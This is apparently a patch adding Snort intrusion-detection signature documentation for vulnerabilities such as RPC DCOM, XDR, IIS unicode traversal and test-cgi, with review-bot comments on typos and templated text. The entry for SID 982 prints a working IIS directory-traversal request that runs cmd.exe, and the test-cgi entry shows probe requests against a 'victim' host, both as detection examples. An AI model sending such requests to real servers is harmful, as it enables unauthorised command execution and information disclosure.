+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
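Review bot: typo in Detailed Information, `running ona web server` should be `on a web server`, and `attackers choosing` (in both Impact and Detailed Information) should be `attacker's choosing`. The Summary does not say which CGI application or request pattern SID 837 detects, and Additional References is empty, so this reads as template text; suggest naming the script the rule matches.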
--- /dev/null
+++ b/doc/signatures/3288.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3288
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
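Review bot: same comments as for 3341.txt above: `Expoit` typo, duplicated RPC DCOM text with nothing specific to SID 3288, and an empty Additional References section.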
--- /dev/null
+++ b/doc/signatures/2094.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2094
+
+--
+Summary:
+vulnerability in the rpc service for the Calendar Manager Service Daemon
+(CMSD) used by XDR.
+
+--
+Impact:
+System compromise, denial of service, execution of arbitrary code, 
+information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in various implementations of external data 
+representation (XDR) libraries. An integer overflow in a component 
+(xdr_array) used by XDR can lead to a buffer overflow.
+
+The XDR libraries are widely used by multiple vendors to provide a 
+framework for data transmission across networks. This is most commonly 
+used in RPC implementations.
+
+A specially crafted rpc request containing a large number of arguments 
+to xdr_array can lead to remote system compromise and super user access 
+to the target host. Additionally, a denial of service and execution of 
+arbitrary code with the privilege of the super user is also possible 
+depending on the platform used.
+
+--
+Affected Systems:
+Multiple verndors including all those using:
+	Sun Microsystems Network Services Library (libnsl)
+	GNU C library with sunrpc (glibc)
+	BSD-derived libraries with XDR/RPC routines (libc)
+
+--
+Attack Scenarios:
+The attacker needs to send a specially crafted rpc request containing a 
+large number of arguments for xdr_array to the target host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade the vendor libraries to the latest non-affected versions. Any 
+statically linked binaries and applications must be recompiled and 
+restarted after the upgrade.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5356
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0391
+
+CERT:
+http://www.cert.org/advisories/CA-2002-25.html
+http://www.kb.cert.org/vuls/id/192995
+
+--
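Review bot: the Summary starts mid-sentence (`vulnerability in the rpc service for the Calendar Manager Service Daemon`); the leading `This event is generated when an attempt is made to exploit a known` used by the other files appears to have been dropped. The phrase `(CMSD) used by XDR` also has the relationship backwards given Detailed Information, which says the XDR libraries are used by RPC services such as CMSD, not the other way round. Typo in Affected Systems: `verndors`. The Corrective Action note that statically linked binaries must be recompiled is a good catch and should stay.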
--- /dev/null
+++ b/doc/signatures/430.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+430
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Type 40 Code 1 Authentication Failed datagram.
+
+--
+
+Impact:
+ICMP Type 40 Code 1 datagrams are an indication that a received datagram failed the authenticity or integrity check for a given SPI.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 Code 1 datagrams are generated when a received datagram failed the authenticity or integrity check for a given SPI (Security Parameters Index).  In some situations this may be an indication that an outer Encapsulation Security Protocol is in use, and the Authentication Header SPI is hidden inside the encapsulation.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
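Review bot: the Affected Systems section present in every other file is missing here. Typos: `a host generates and ICMP Type 40` should be `an ICMP`, and the Corrective Action sentence `ICMP Type 40 datagrams not normally seen on the network.` is missing `are`. Ease of Attack says `Numerous tools and scripts can generate this type of ICMP datagram` while Attack Scenarios says `None known`; if the point is that the datagram is trivially forged and therefore worth investigating, say so under Attack Scenarios rather than leaving it at none.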
--- /dev/null
+++ b/doc/signatures/210.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+210
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a Telnet server using the phrase "backdoor".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
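Review bot: Detailed Information is incomplete, `This Trojan affects UNIX operating systems:` ends in a colon with nothing following, and no Affected Systems section is present; either list the affected systems there or finish the sentence. The Summary says the client connects `using the phrase "backdoor"`; clarify whether that string is matched as the login name or anywhere in the session, since that determines the false positive rate, which is listed as `None Known`.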
--- /dev/null
+++ b/doc/signatures/3427.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3427
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
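Review bot: same comments as for 3341.txt above: `Expoit` typo, duplicated RPC DCOM text with nothing specific to SID 3427, and an empty Additional References section.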
--- /dev/null
+++ b/doc/signatures/2863.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2863
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_nvarchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
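Review bot: a stray line break splits the sentence in Detailed Information (`vulnerability in the procedure add_priority_nvarchar2` / `. This procedure is included in`); join it so the period follows the procedure name. `Oracle Oracle9i` under Affected Systems duplicates the vendor name. Corrective Action says `Apply the appropriate vendor supplied patch` but Additional References is empty, so the reader has no pointer to which patch is meant.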
--- /dev/null
+++ b/doc/signatures/1777.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+1777
+--
+Summary:
+This rule detects an attacker executing the STAT command along with file globbing character '*'. This affects Cisco equipment and Microsoft's IIS 4.0, 5.0, and 5.1. 
+
+--
+Impact:
+Severe; this vulnerablity is remotely exploitable, and is present on systems that are widely deployed.
+--
+Detailed Information:
+This rule detects an attacker executing the STAT command along with file globbing character '*'.  There is a vulnerability in Microsofts IIS 4.0, 5.0, and 5.1 servers,  that causes the service to crash once it receives the STAT command along with a large number of file globbing characters.  
+
+VisNetic and Titan FTP servers are also vulnerable to an attack which can present the attacker with the opportunity to break out of the ftp root directory using this command.
+
+--
+Affected Systems:
+Microsoft Internet Information Server 4, 5 and 5.1
+Some versions of Cisco equipment
+VisNetic FTP Server
+Titan FTP Server
+
+--
+Attack Scenarios:
+An attacker logs into a vulnerable hosts and executes the STAT command with multiple file globbing characters.  This would cause the service to crash.
+
+The attacker may also use Nessus to scan for a vulnerable server.
+
+--
+Ease of Attack:
+The attack can be executed with relative ease.
+--
+False Positives:
+None known to date
+--
+False Negatives:
+None known to date.
+--
+Corrective Action:
+Microsoft has released a IIS Security Roll-up Package that addresses this issue.  The Roll-up package can be found at: 
+http://www.microsoft.com/ntserver/nts/downloads/security/q319733/default.asp 
+More information on this package can be found at: 
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-018.asp
+--
+Contributors:
+Sourcefire Research Team
+mike.poor@sourcefire.com
+-- 
+Additional References:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-018.asp
+http://www.microsoft.com/ntserver/nts/downloads/security/q319733/default.asp
+
+
+--
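Review bot: Corrective Action only covers the Microsoft IIS roll-up, although Affected Systems also lists Cisco equipment, VisNetic FTP Server and Titan FTP Server; add the vendor guidance for those or state that none is listed. Typos: `vulnerablity` in Impact, `Microsofts` in Detailed Information, `a vulnerable hosts` in Attack Scenarios. Several sections here lack the blank line before `--` that the other files use.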
--- /dev/null
+++ b/doc/signatures/2017.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2017
+
+--
+Summary:
+Embedded Support Partner (ESP) is an integral part of the SGI IRIX 
+operating system to enable remote support for the operating system
+
+A vulnerability exists in the Embedded Support Partner Daemon (ESP) that
+could lead to arbitrary commands being executed on a target host.
+
+--
+Impact:
+Remote super user access leading to a compromise of the target machine 
+along with any network resources that machine is connected to.
+
+--
+Detailed Information:
+The ESP daemon is an RPC (Remote Procedure Call) resource used on SGI 
+IRIX systems. The ESP daemon runs with the privileges of the root user. 
+IRIX version 6.5.8 and prior are susceptible to a buffer overflow of the
+ESP daemon leading to a remote root compromise of the affected host.
+
+--
+Affected Systems:
+SGI IRIX 6.5.8 and earlier.
+
+--
+Attack Scenarios:
+The attacker would need to craft a packet that would lead to the buffer
+overflow. No current exploits are available.
+
+--
+Ease of Attack:
+Difficult
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+All systems running vulnerable versions of rpc.espd should have the appropriate patch applied. 
+
+Additionally, the ESP daemon should be disabled where not needed by 
+commenting out the appropriate line in inetd.conf. The daemon itself can
+be made non-executable by removal of the x bit (chmod -x rpc.espd).
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0331
+
+Bugtraq:
+http://www.securityfocus.com/bid/2714
+
+--
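Review bot: the Summary describes what ESP is but never states what the event indicates; the other files open with `This event is generated when an attempt is made to ...`, and the first Summary sentence is also missing its final period. In Corrective Action, `filter RPC ports at the firewall to ensure access is denied to RPC enabled machines` reads as denying all access to those machines; suggest `access to the RPC ports on those machines`.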
--- /dev/null
+++ b/doc/signatures/835.txt
@@ -0,0 +1,66 @@
+Rule:
+--
+Sid:
+835
+
+--
+Summary:
+This event is generated when an attempt is made to 
+access to the cgi script test-cgi.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+The test-cgi script is provided as part of the Apache web server to
+test that cgi scripts are working.  It can provide vital information
+about the configuration of your webserver that may be invaluable to a
+potential attacker.
+
+--
+Affected Systems:
+	All versions of Apache.
+ 
+--
+Attack Scenarios:
+A standard web request using a browser.
+
+lynx http://victim/cgi-bin/test-cgi
+
+$ telnet victim 80
+Trying 192.168.0.2...
+Connected to victim.
+Escape character is '^]'.
+GET /cgi-bin/test-cgi HTTP/1.0
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+This may trigger on urls containing test-cgi, but are not necessarily
+indicative of an attack.  For example,
+http://myhost.org/home/foobar/test-cgi.txt would trigger this rule.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine the need for this script, and remove it if there is no need.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
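Review bot: grammar in the Summary, `an attempt is made to access to the cgi script test-cgi` should drop the second `to`. The False Positives example (`http://myhost.org/home/foobar/test-cgi.txt would trigger this rule`) is useful; given it, Corrective Action could add that an event from a host known not to ship the script is a false positive to tune out rather than a compromise indicator.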
--- /dev/null
+++ b/doc/signatures/3247.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3247
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
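Review bot: same comments as for 3341.txt above: `Expoit` typo, duplicated RPC DCOM text with nothing specific to SID 3247, and an empty Additional References section.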
--- /dev/null
+++ b/doc/signatures/982.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+982
+
+--
+Summary:
+This event is generated when an attempt is made use a unicode encoded representaion of a "\" in a URL request.  This may permit an attacker to navigate to files and directories outside the web root of a vulnerable Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can allow an attacker to execute commands a vulnerable IIS server. 
+
+--
+Detailed Information:
+User access should be restricted to an assigned web root directory and subdirectories when interacting with a web server.  Attackers who attempt to perform directory traversals outside the web root should be denied access.  A vulnerability exists in IIS web servers that allows directory traversal outside the web root directory when unicode encoding of specific characters is used.  This particular attack uses the unicode encoding of the "\" to escape the web root.  This may permit an attacker to execute commands on the vulnerable server. 
+
+--
+Affected Systems:
+IIS 4.0, 5.0 servers
+
+--
+Attack Scenarios:
+An attacker can unicode encode a directory traversal character permitting execution of commands on the IIS server. 
+
+--
+Ease of Attack:
+Simple. 
+GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link. 
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0084
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
+
+--
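Review bot: typos in the Summary, `an attempt is made use a unicode encoded representaion` should be `made to use ... representation`; in Impact, `execute commands a vulnerable IIS server` is missing `on`. Corrective Action says `Apply the patch referenced in the Microsoft link`; naming the bulletin in the sentence (MS00-078, which is what the listed URL points at) would save the reader a lookup.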
--- /dev/null
+++ b/doc/signatures/100000832.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000832
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "markas" parameter in the "read.markas.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
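Review bot: the Impact text (`Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code ...`) is the generic CGI template and overstates a cross site scripting issue; Attack Scenarios describes the actual risk, `a malicious link designed to steal information from a user clicking on that link`, so Impact should describe client-side consequences (session or credential theft from the victim user) rather than server compromise. `All systems running CGI applications using HiveMail` under Affected Systems should just be `All systems running HiveMail`. Several `--` separators here lack the preceding blank line.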
--- /dev/null
+++ b/doc/signatures/2001.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2001
+
+--
+Summary:
+This event is generated when a remote user attempts to access smartsearch.cgi on a web server. This may indicate an attempt to exploit an arbitrary code execution vulnerability in Smart Search, a "pay-per-click" search engine.
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+Smart Search "pay-per-click" search engine software contains a vulnerability that allows code execution using a specially-crafted URL. Using the "keywords" parameter accepted by smartsearch.cgi, an attacker can pass arbitrary Perl code to the web server, which will then attempt to execute it.
+
+--
+Affected Systems:
+Any server using Smart Search 4.x.
+
+--
+Attack Scenarios:
+An attacker can pass Perl code to a web server running Smart Search by forwarding a URL with specific keyword parameters. The web server will then attempt to execute the commands included in the URL.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+If a legitimate remote user accesses smartsearch.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched in recent versions. Contact the vendor (http://www.smarterscripts.com/smartsearch/index.shtml) for more details. 
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+SecuriTeam
+http://www.securiteam.com/exploits/5AP041F8VA.html
+
+Secunia
+http://www.secunia.com/advisories/8389/
+
+--
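Review bot: False Positives correctly says a legitimate request to smartsearch.cgi generates an event, which means the rule matches on access to the script rather than on the `keywords` parameter described in Detailed Information; the Summary should say so plainly, so the analyst knows an event is not by itself evidence of exploitation. In Attack Scenarios, `forwarding a URL` should be `sending a request`.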
--- /dev/null
+++ b/doc/signatures/1320.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1320
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "fuck movies".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "fuck movies".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.  This rule could also be triggered by visiting the website of somebody who really really doesn't like movies.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
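Review bot: typo in the Summary, `a webpage was visited the included the content` should be `that included`. The Summary also says a page was `visited` while Detailed Information says the rule matches `a response from a webserver`; the latter is the precise statement, so align the Summary with it. The run of empty `+` lines after Additional References should be trimmed to match the other files.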
--- /dev/null
+++ b/doc/signatures/2061.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2061
+
+--
+Summary:
+Jakarta Tomcat webserver.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+A vulnerability exists in Jakarta Tomcat webservers prior to version 
+3.3.1a such that a request containing a null byte will result in a 
+directory listing or present the opportunity to view the source of a 
+java servlet on the server.
+
+This occurs wether or not an index file is present in the directory.
+
+--
+Affected Systems:
+Jakarta Tomcat web application server prior to version 3.3.1a
+
+--
+Attack Scenarios:
+The attacker needs to supply a null byte in a URI request to the server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade the server to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0042
+
+Apache Jakarta Tomcat:
+http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/
+
+--
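Review bot: the Summary `+Jakarta Tomcat webserver.` is a fragment that does not say what the event means; suggest `This event is generated when a request containing a null byte is sent to a Jakarta Tomcat webserver.` Also `wether` in `+This occurs wether or not an index file is present in the directory.` should be `whether`.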
--- /dev/null
+++ b/doc/signatures/3216.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3216
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
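Review bot: the Attack Scenarios text `+An attacker may make a request for a file with an overly long filename via a network share.` does not match the Detailed Information, which describes a malformed request sent to an RPC port; the scenario should describe the malformed RPC request instead. `Expoit` in `+Simple. Expoit code exists.` should be `Exploit`, and `Additional References:` is empty even though 2192.txt in this same patch carries Microsoft and CVE links for the RPC DCOM issue; a vendor bulletin reference would help analysts.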
--- /dev/null
+++ b/doc/signatures/3384.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3384
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
